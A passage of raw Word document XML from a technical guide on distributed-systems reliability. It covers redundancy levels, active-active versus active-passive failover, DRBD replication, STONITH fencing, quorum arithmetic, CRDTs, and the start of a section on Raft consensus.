        <w:t> 2 spares. Survives 2 simultaneous failures. Required for 5-nine systems where scheduled maintenance (taking 1 node down) must coincide safely with an unexpected failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBC8CC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2N redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Full duplication. Two complete, independent systems either active-active or active-passive. The standby has 100% capacity. Survives complete failure of one full system. Used for critical control systems, primary databases with hot standbys, disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41533524" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2N+1 redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Two full systems plus a tiebreaker. Used in consensus systems where you need a deciding vote when the two primary systems disagree. The +1 node breaks ties without carrying full workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A89A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active vs Active-Passive — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEFDB3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA412D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Both instances simultaneously handle production traffic. Load balancer distributes across both. When one fails, the other absorbs 100% of traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A630DA1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal requirement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> State must be either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E8864" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shared</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (both instances read/write the same external store — database, Redis). No in-memory state per instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993594A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (state is replicated between instances in real time — databases, distributed caches). Adds replication overhead and consistency complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D55A7B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partitioned</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (each instance owns a subset of state — consistent hashing assigns users to instances). On failure, the failed instance's partition must be taken over by survivors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCD80F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The active-active catch:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each instance must have headroom for 100% load (in a 2-instance cluster). If each runs at 60% under normal conditions, one failure takes the survivor to 120% — overload and potential cascade. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N-1 capacity planning rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>: provision each instance to handle the load of all instances if N-1 fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F973D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive (Hot Standby):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDE861" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Primary instance handles all traffic. Standby runs in parallel, continuously synchronized with primary state, but doesn't serve traffic. On primary failure: promote standby, redirect traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928B2F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronization mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4965C25C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Database replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> WAL streaming (PostgreSQL), binlog replication (MySQL). The standby applies all write operations from the primary in sequence. Replication lag is the gap between primary's current state and standby's applied state. Zero-lag requires synchronous replication (primary waits for standby acknowledgment) — adds write latency proportional to network RTT between primary and standby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE1218" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Storage-level replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Block device mirroring (DRBD — Distributed Replicated Block Device). Every write to the primary's block device is synchronously mirrored to the standby's block device at the storage layer. The database doesn't know about the replication — it just writes to its disk. On failover, the standby has an identical disk image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65691847" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DRBD internals:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> DRBD presents a virtual block device (/dev/drbd0) to the OS. Writes to this device are intercepted by the DRBD kernel module, written locally, and simultaneously sent to the peer node over a dedicated replication network. Only acknowledged to the OS after </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> nodes confirm the write (synchronous mode). The peer applies the write to its local block device. In split-brain scenarios, DRBD has configurable resolution policies (discard newer data, discard older data, manual resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD55BC6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>State machine replication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If the system is modeled as a deterministic state machine, the standby can replicate state by receiving the same </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sequence of inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> as the primary and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>applying them in the same order. Given identical starting state and identical input sequence, the state machine produces identical state. Used by databases (WAL is the input sequence) and consensus systems (Raft log is the input sequence).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E77B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2CD6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Heartbeat timeout, health check failure, storage fence signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F4EF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fencing the old primary (STONITH):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Before promoting the standby, ensure the old primary </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> accept new writes. Even if it's "failed," it might recover briefly and accept a write that the new primary doesn't know about — creating conflicting state. STONITH sends a command to the old primary's IPMI/iDRAC interface, physical power switch, or cloud API (AWS: stop the EC2 instance) to forcibly shut it down. Only after confirmed shutdown is the standby promoted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75057CD9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Promotion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Standby transitions from read-only to read-write mode (in database terms: ends recovery mode, begins accepting write transactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E937B4D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic redirection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> DNS update, VIP takeover, load balancer reconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE3D86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Verify the new primary's state is consistent before accepting writes. In Raft, the new leader runs a read index protocol to ensure its log is complete before serving reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAFD99" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fencing gap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The time between detecting primary failure and confirming it's fenced is a window of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>potential split-brain</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. This is why automated failover systems are conservative — they'd rather wait an extra 10 seconds to ensure proper fencing than race into split-brain. The fencing timeout directly contributes to RTO (Recovery Time Objective).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F87BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quorum Systems — The Mathematics of Reliability Under Partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33271722" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A quorum system defines the minimum number of nodes that must agree before an operation is considered complete. This prevents split-brain while tolerating node failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF331D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read quorum (R) and Write quorum (W) in a system with N replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548CF7A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C638C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>For strong consistency: R + W &gt; N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E93BEBD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="75091A12" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>N=3, W=2, R=2: Writes need 2/3 nodes. Reads need 2/3 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A1454" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  R + W = 4 &gt; 3 = N ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ADB05" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Can tolerate 1 node failure for both reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B211613" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="7F58A6C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>N=5, W=3, R=3: Tolerates 2 node failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702EBE6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  R + W = 6 &gt; 5 = N ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162094AC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why R + W &gt; N guarantees consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Any write quorum (W nodes) and any read quorum (R nodes) must overlap by at least one node. That overlapping node has the latest write. The reader always sees the latest written value by reading from R nodes — at least one of them has the latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF45436" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tuning the quorum trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F91A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2992AAA0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>N=5, W=5, R=1: Every node must acknowledge writes. Reads are fast (ask any 1 node).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA88D7E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Maximally consistent reads, but writes fail if any node is down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F492504" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Used for: leader election, critical configuration changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241DE93D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="2A899A62" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>N=5, W=1, R=5: Write to any 1 node. Reads must check all nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF4778A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Writes are fast, but reads are slow and expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AF672" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Used for: write-heavy logging systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED636F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="210C6215" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>N=5, W=3, R=3: Balanced. Tolerates 2 node failures for both reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B816A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → The most common configuration (DynamoDB default, Cassandra with QUORUM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140ABC9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sloppy quorum (Dynamo-style):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Under network partitions, strict quorum may be impossible — you can't reach W nodes. Sloppy quorum relaxes this: write to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any W available nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, even if they're not the "correct" nodes for this key's partition. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hinted handoff</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the incorrect node stores the write with a hint that it belongs to the correct node. When the correct node recovers, the incorrect node forwards the hinted write. This maximizes write availability at the cost of consistency — reads may not see the latest write until hinted handoffs are applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290ADD44" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRDT (Conflict-free Replicated Data Types):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> For systems where sloppy quorum causes conflicts (two nodes accept conflicting writes to the same key), CRDTs are data structures </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>designed so that </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concurrent conflicting operations can always be merged deterministically</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> without human intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D749BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>G-Counter (Grow-only Counter):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each node maintains its own counter. The value is the sum of all node counters. Incrementing only increases the local counter — never conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34499C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LWW-Register (Last Write Wins):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Each write is timestamped. On conflict, the write with the higher timestamp wins. Simple but requires synchronized clocks (problematic) and may lose writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8D07C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OR-Set (Observed-Remove Set):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Add and remove operations on a set, concurrent adds and removes are resolved by making add win. Uses unique tags per add operation so removes reference specific adds, not ambiguous element membership.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262E903" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>CRDTs are used in systems like Riak, Redis (CRDT support), Cassandra (counters are CRDTs) — enabling eventual consistency with deterministic convergence and no conflict resolution code in the application layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2791C1E7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="59D6DDF8">
          <v:rect id="_x0000_i2784" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC87C09" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Consensus Algorithms — The Foundation of Distributed Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B29D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Distributed reliability requires that multiple nodes </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>agree</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> on system state — who is the leader, what value was written, what is the current configuration. Consensus algorithms are the mechanism for achieving this agreement despite node failures and network partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71908B92" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raft — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51474CE9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Raft was designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>understandable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (unlike Paxos, which is notoriously difficult to implement correctly). It decomposes consensus into three sub-problems: leader election, log replication, and safety.</w:t>
      </w:r>
    </w:p>
